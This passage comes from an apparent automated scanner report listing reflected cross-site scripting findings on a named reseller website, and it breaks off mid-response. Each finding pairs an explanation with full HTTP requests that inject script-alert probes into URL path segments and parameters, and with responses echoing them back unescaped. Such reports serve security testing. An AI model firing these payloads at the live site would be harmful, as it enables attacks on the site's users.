The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b13d4<script>alert(1)</script>b6e0ec6c7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&b13d4<script>alert(1)</script>b6e0ec6c7af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&b13d4<script>alert(1)</script>b6e0ec6c7af=1 was not found on this server.</p>
...[SNIP]...

2.5314. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ee281<a>643a3079de3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ee281<a>643a3079de3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ee281<a>643a3079de3 was not found on this server.</p>
...[SNIP]...

2.5315. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b924<script>alert(1)</script>75c1a900a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5b924<script>alert(1)</script>75c1a900a51/software-scripts/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5b924<script>alert(1)</script>75c1a900a51/software-scripts/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5316. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ebbbc<script>alert(1)</script>c7f4cbb86bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsebbbc<script>alert(1)</script>c7f4cbb86bb/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsebbbc<script>alert(1)</script>c7f4cbb86bb/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5317. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53d5a<script>alert(1)</script>7c59e25e65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes53d5a<script>alert(1)</script>7c59e25e65f/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes53d5a<script>alert(1)</script>7c59e25e65f/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5318. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ffa3<script>alert(1)</script>d5c40e82aa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos9ffa3<script>alert(1)</script>d5c40e82aa2/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos9ffa3<script>alert(1)</script>d5c40e82aa2/images/review/ was not found on this server.</p>
...[SNIP]...

2.5319. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 537ac<script>alert(1)</script>1ceaf0f9082 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images537ac<script>alert(1)</script>1ceaf0f9082/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images537ac<script>alert(1)</script>1ceaf0f9082/review/ was not found on this server.</p>
...[SNIP]...

2.5320. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44350<script>alert(1)</script>dd95a33fe0b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review44350<script>alert(1)</script>dd95a33fe0b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review44350<script>alert(1)</script>dd95a33fe0b/ was not found on this server.</p>
...[SNIP]...

2.5321. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f21b1<script>alert(1)</script>8b4fa7516cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/?f21b1<script>alert(1)</script>8b4fa7516cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/?f21b1<script>alert(1)</script>8b4fa7516cf=1 was not found on this server.</p>
...[SNIP]...

2.5322. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbacf<script>alert(1)</script>16f8715317e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebbacf<script>alert(1)</script>16f8715317e/software-scripts/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebbacf<script>alert(1)</script>16f8715317e/software-scripts/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5323. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3da6a<script>alert(1)</script>3d4fe3ed74f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts3da6a<script>alert(1)</script>3d4fe3ed74f/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts3da6a<script>alert(1)</script>3d4fe3ed74f/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5324. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97bd4<script>alert(1)</script>fdb410fb3cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes97bd4<script>alert(1)</script>fdb410fb3cd/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes97bd4<script>alert(1)</script>fdb410fb3cd/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5325. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0692<script>alert(1)</script>ecbf09e32fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosf0692<script>alert(1)</script>ecbf09e32fe/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosf0692<script>alert(1)</script>ecbf09e32fe/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5326. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88d6d<script>alert(1)</script>db35f4838e6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images88d6d<script>alert(1)</script>db35f4838e6/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images88d6d<script>alert(1)</script>db35f4838e6/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5327. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ee4f<script>alert(1)</script>4a7fa34228a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review7ee4f<script>alert(1)</script>4a7fa34228a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review7ee4f<script>alert(1)</script>4a7fa34228a/0.gif was not found on this server.</p>
...[SNIP]...

2.5328. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1b1a8<script>alert(1)</script>a67067f925a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/0.gif1b1a8<script>alert(1)</script>a67067f925a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/0.gif1b1a8<script>alert(1)</script>a67067f925a was not found on this server.</p>
...[SNIP]...

2.5329. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdc27<script>alert(1)</script>2714fca71ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/0.gif?fdc27<script>alert(1)</script>2714fca71ae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/0.gif?fdc27<script>alert(1)</script>2714fca71ae=1 was not found on this server.</p>
...[SNIP]...

2.5330. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9937<script>alert(1)</script>eb7b3b9a721 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea9937<script>alert(1)</script>eb7b3b9a721/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea9937<script>alert(1)</script>eb7b3b9a721/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5331. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8fb2<script>alert(1)</script>bb34a93f238 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsd8fb2<script>alert(1)</script>bb34a93f238/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:02 GMT
Server: Apache/2
